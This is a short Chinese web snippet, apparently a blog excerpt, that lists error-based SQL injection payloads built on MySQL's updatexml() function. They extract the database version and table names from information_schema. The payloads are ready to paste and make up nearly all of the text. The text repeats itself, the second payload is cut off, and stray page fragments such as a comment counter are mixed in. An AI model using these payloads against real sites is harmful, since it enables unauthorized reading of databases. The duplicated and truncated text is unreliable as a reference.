报错注入Payload:
一、updatexml()
1.select:
xxx' and updatexml(1,concat(0x7e,version()),0)#
其中,“version()“替换成其他payload,比如:
xxx' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='数据库名称'))
本文详细介绍了如何通过updatexml函数实现SQL注入,包括select、insert和delete操作的payload构造,以及如何通过burpsuite抓包处理GET请求的删除操作。重点讲解了利用'andupdatexml()'函数结合数据库元数据获取和构造恶意代码的方法。
报错注入Payload:
一、updatexml()
1.select:
xxx' and updatexml(1,concat(0x7e,version()),0)#
其中,“version()“替换成其他payload,比如:
xxx' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='数据库名称'))
2859

被折叠的 条评论
为什么被折叠?
